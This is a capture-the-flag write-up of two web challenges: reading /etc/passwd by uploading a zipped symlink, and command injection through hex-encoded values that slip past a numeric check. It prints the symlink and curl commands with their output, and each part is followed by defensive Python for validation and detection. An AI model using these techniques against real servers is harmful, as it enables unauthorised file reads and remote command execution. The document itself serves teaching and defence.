********************
## [Web](#) *200*
by vic511
********************
First of all, the home page explains the concept to us: it's an online tool where you can upload zip files and freely explore their content. We can see something interesting in the source code:
```php
<?php
// Snippet visible in the page source: the challenge reads the login shell
// field of the "dctf" user, which is where the flag turns out to be stored.
$shell = shell_exec("getent passwd dctf | cut -d: -f7"); ?>
```
Then we can suppose the server is running PHP under Linux, and we know what data we should be able to get. I uploaded some files containing special chars, in the zip file name or in the zipped files, but I had no significant results. The output of the command `unzip archive.zip` (the uploaded file is renamed to archive.zip) may have been an attack vector, but I couldn't exploit it in any way.
I looked on the web to see whether I could zip symlinks, so I tried to access the content of `/etc/passwd` by zipping a symlink pointing to it.
```bash
vic511@vic511:~/challenges/ctfs/dctf2k15/web$ ln -s /etc/passwd passwd
```
Then zip it with the `--symlinks` option (otherwise it would just zip the content of your own /etc/passwd).
```bash
vic511@vic511:~/challenges/ctfs/dctf2k15/web$ zip --symlinks -r h.zip passwd
```
Now it's time to upload the malicious zip file. Once it's uploaded, the passwd file is not shown as existing, but don't worry, it's there.
All you have to do now is get its content!
```bash
vic511@vic511:~/challenges/ctfs/dctf2k15/web$ curl "http://10.13.37.3/?id=xxx&file=./passwd"
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin
syslog:x:102:105::/home/syslog:/bin/false
ubuntu:x:1000:1000::/home/ubuntu:/bin/bash
mysql:x:103:106:MySQL Server,,,:/nonexistent:/bin/false
dctf:x:65533:65533:DCTF,,,:/nonexistent:/DCTF{28fad39245bc57404263540e94f417d8}
```
> The flag is DCTF{28fad39245bc57404263540e94f417d8}!
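As an added example (not part of the writeup and not the challenge's own code; written in Python rather than the server's PHP so that it runs stand-alone), here is the check a defender would put in front of `unzip`: inspect each archive member's external attributes for the symlink type bit and its name for absolute paths or `..`, skip such members, and additionally resolve the `?file=` parameter with realpath and require the result to stay under the extraction directory. The archive, the member names and the `/etc/passwd` target are constructed inline to mirror the writeup's `h.zip`; the directory layout is an assumption.

```python
from __future__ import annotations
import io
import os
import stat
import tempfile
import zipfile

# Constructed sample archive: the shape of the writeup's h.zip (a symlink
# member named "passwd" whose target is /etc/passwd) plus one ordinary file
# and one path-traversal member, built in memory so the example runs offline.
def build_sample_zip() -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        link = zipfile.ZipInfo("passwd")
        link.create_system = 3                      # 3 = UNIX: st_mode sits in the high 16 bits
        link.external_attr = (stat.S_IFLNK | 0o777) << 16
        zf.writestr(link, "/etc/passwd")            # a symlink member's data is its target path
        zf.writestr("notes.txt", "harmless content\n")
        zf.writestr("../escape.txt", "would land outside the extraction dir\n")
    return buf.getvalue()

def entry_problems(info: zipfile.ZipInfo) -> list[str]:
    """Reasons a member must not be handed to unzip(1) (empty list = fine)."""
    problems = []
    if info.create_system == 3 and stat.S_ISLNK(info.external_attr >> 16):
        problems.append("symlink")
    name = info.filename.replace("\\", "/")
    if name.startswith("/") or os.path.isabs(name):
        problems.append("absolute path")
    if ".." in name.split("/"):
        problems.append("path traversal")
    return problems

def audit_zip(zip_bytes: bytes) -> dict[str, list[str]]:
    """Map every member name to its problems; safe members map to []."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return {info.filename: entry_problems(info) for info in zf.infolist()}

def safe_extract(zip_bytes: bytes, dest: str) -> list[str]:
    """Extract only problem-free members; returns the names that were skipped.
    (Python's zipfile never creates symlinks itself, but the challenge shelled
    out to unzip, which does, so the policy is to refuse them up front.)"""
    skipped = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if entry_problems(info):
                skipped.append(info.filename)
            else:
                zf.extract(info, dest)
    return skipped

def resolve_inside(base: str, requested: str) -> str | None:
    """Second line of defence for the ?file= parameter: resolve symlinks and
    '..', then serve only if the real path still lies under the extraction
    directory. A link to /etc/passwd resolves outside and is refused."""
    real_base = os.path.realpath(base)
    real_path = os.path.realpath(os.path.join(real_base, requested))
    if os.path.commonpath([real_base, real_path]) != real_base:
        return None
    return real_path

def demo() -> dict:
    """Run both checks end to end in a temporary directory and return the
    observations as a dict (assumed layout: one extraction dir per upload)."""
    zip_bytes = build_sample_zip()
    report = audit_zip(zip_bytes)
    with tempfile.TemporaryDirectory() as dest:
        skipped = safe_extract(zip_bytes, dest)
        # Simulate what `unzip` would have done with the symlink member, to
        # show that the path check refuses to serve it even if it got through.
        os.symlink("/etc/passwd", os.path.join(dest, "passwd"))
        return {
            "report": report,
            "skipped": sorted(skipped),
            "serve_link": resolve_inside(dest, "./passwd"),
            "serve_ok": resolve_inside(dest, "notes.txt") is not None,
        }

if __name__ == "__main__":
    for name, problems in demo()["report"].items():
        print(f"{name:15} {'OK' if not problems else ', '.join(problems)}")
```

Both layers matter: rejecting the member stops the link from being created, and the realpath check stops an already-extracted link (or a `../` in `?file=`) from being read, so a bug in one layer does not reopen the file read.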
********************
## [Web](#) *400*
by vic511
********************
In this challenge, we can see an ugly web page showing images. Every image is linked to a user, and we can access them by passing parameters to index.php: http://10.13.37.5/?id=1&usr=1
I messed around with the parameters and got an interesting piece of information: the images are output through the Linux command `cat`. I tried unsuccessfully to get RCE, because the page was only accepting numeric values. I suddenly remembered that PHP is very flexible, and would consider strings such as `0xdeadbeef` as numeric.
```bash
vic511@vic511:~/challenges/ctfs/dctf2k15/web$ curl "http://10.13.37.5/?usr=3&id=0xdeadbeef" -vvv
* Hostname was NOT found in DNS cache
* Trying 10.13.37.5...
* Connected to 10.13.37.5 (10.13.37.5) port 80 (#0)
> GET /?usr=3&id=0xdeadbeef HTTP/1.1
...
>
cat: images/ޭ��_269.jpg: No such file or directory
* Connection #0 to host 10.13.37.5 left intact
```
Very nice! We can then bypass the filter and use hexadecimal strings to get RCE! I'm gonna use the xxd tool to generate the hexadecimal string, so the commands stay human-readable.
```bash
vic511@vic511:~/challenges/ctfs/dctf2k15/web$ curl "http://10.13.37.5/?usr=3&id=0x$(echo "lol;ls -la 2>&1" | xxd -p)" -vvv
* Hostname was NOT found in DNS cache
* Trying 10.13.37.5...
* Connected to 10.13.37.5 (10.13.37.5) port 80 (#0)
> GET /?usr=3&id=0x6c6f6c3b6c73202d6c6120323e26310a HTTP/1.1
...
>
total 44
drwxr-xr-x 3 root root 4096 Oct 3 16:15 .
drwxr-xr-x 3 root root 4096 Oct 1 22:08 ..
-rw-r--r-- 1 root root 17 Oct 1 22:20 .htaccess
-rw-r--r-- 1 root root 38 Oct 1 22:14 6e8218531e0580b6754b3e3be5252873.txt
drwxrwxr-x 2 root root 4096 Oct 1 22:14 images
-rw-r--r-- 1 root root 21392 Oct 1 22:17 index.php
sh: 2: _269.jpg: not found
* Connection #0 to host 10.13.37.5 left intact
```
w00t! Here we go, let's see what's inside this weird text file.
```bash
vic511@vic511:~/challenges/ctfs/dctf2k15/web$ curl "http://10.13.37.5/?usr=3&id=0x$(echo "lol;cat 6*" | xxd -p)" -vvv
* Hostname was NOT found in DNS cache
* Trying 10.13.37.5...
* Connected to 10.13.37.5 (10.13.37.5) port 80 (#0)
> GET /?usr=3&id=0x6c6f6c3b63617420362a0a HTTP/1.1
...
>
DCTF{19b1f9f19688da85ec52a735c8da0dd3}sh: 2: _269.jpg: not found
* Connection #0 to host 10.13.37.5 left intact
```
> The flag is DCTF{19b1f9f19688da85ec52a735c8da0dd3} :)
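Added example (Python, not the challenge's PHP and not the author's code): the validate-then-use-the-raw-string anti-pattern that this bypass relies on, a strict allow-list validator beside it, a lookup that builds the image path from the validated integers and never goes through a shell, and a small log-triage helper that decodes a `0x` id the way the server evidently did and flags shell metacharacters. The request lines are taken from the writeup's curl output; the other `usr`/`id` values are constructed, and the `images/{id}_{usr}.jpg` naming is an assumption made for the example.

```python
from __future__ import annotations
import os
import re
from urllib.parse import parse_qs, urlsplit

def lax_is_numeric(value: str) -> bool:
    """Anti-pattern: 'numeric' means 'some parser accepts it'. int(x, 0) takes
    0x/0o/0b prefixes, much as PHP 5's is_numeric() accepted hex strings, so
    the writeup's id passes this check and the raw string goes on unchanged."""
    try:
        int(value, 0)
    except ValueError:
        return False
    return True

def strict_id(value: str) -> int | None:
    """Allow-list: a short run of decimal digits only; returns the int or None.
    Prefixes, whitespace, signs and exponents are all rejected outright."""
    if re.fullmatch(r"[0-9]{1,9}", value) is None:
        return None
    return int(value, 10)

def image_path(usr: str, id_: str) -> str | None:
    """Hardened lookup: only the *validated integers* (never the raw strings)
    are formatted into the path, and the caller opens the file directly
    instead of building a 'cat ...' command line, so there is nothing to
    inject into. File naming is assumed for the example."""
    u, i = strict_id(usr), strict_id(id_)
    if u is None or i is None:
        return None
    return os.path.join("images", f"{i}_{u}.jpg")

SHELL_META = set(";|&$`\n<>")

def triage_request(request_line: str) -> dict:
    """Defender's view of an access-log request line: pull the id parameter,
    decode a 0x-prefixed value the way the challenge server evidently did
    (the 0xdeadbeef probe came back as raw bytes in the cat error), and flag
    shell metacharacters in the decoded text."""
    target = request_line.split()[1]               # "GET /?usr=3&id=... HTTP/1.1"
    params = parse_qs(urlsplit(target).query)
    raw = params.get("id", [""])[0]
    decoded = None
    if re.fullmatch(r"0[xX][0-9a-fA-F]+", raw) and len(raw) % 2 == 0:
        decoded = bytes.fromhex(raw[2:]).decode("latin-1")
    suspicious = decoded is not None and any(c in SHELL_META for c in decoded)
    return {
        "raw": raw,
        "strict_ok": strict_id(raw) is not None,
        "decoded": decoded,
        "suspicious": suspicious,
    }

if __name__ == "__main__":
    # Request lines as they appear in the writeup's curl output.
    for line in (
        "GET /?usr=3&id=0xdeadbeef HTTP/1.1",
        "GET /?usr=3&id=0x6c6f6c3b6c73202d6c6120323e26310a HTTP/1.1",
        "GET /?usr=1&id=1 HTTP/1.1",                 # constructed benign request
    ):
        t = triage_request(line)
        print(f"{t['raw']:40} lax={lax_is_numeric(t['raw'])} "
              f"strict={t['strict_ok']} suspicious={t['suspicious']}")
```

The first probe (`0xdeadbeef`) is not flagged by the metacharacter check, so on its own a detection rule would miss it; the strict validator still rejects it, which is why the allow-list is the control and the log triage is only corroboration.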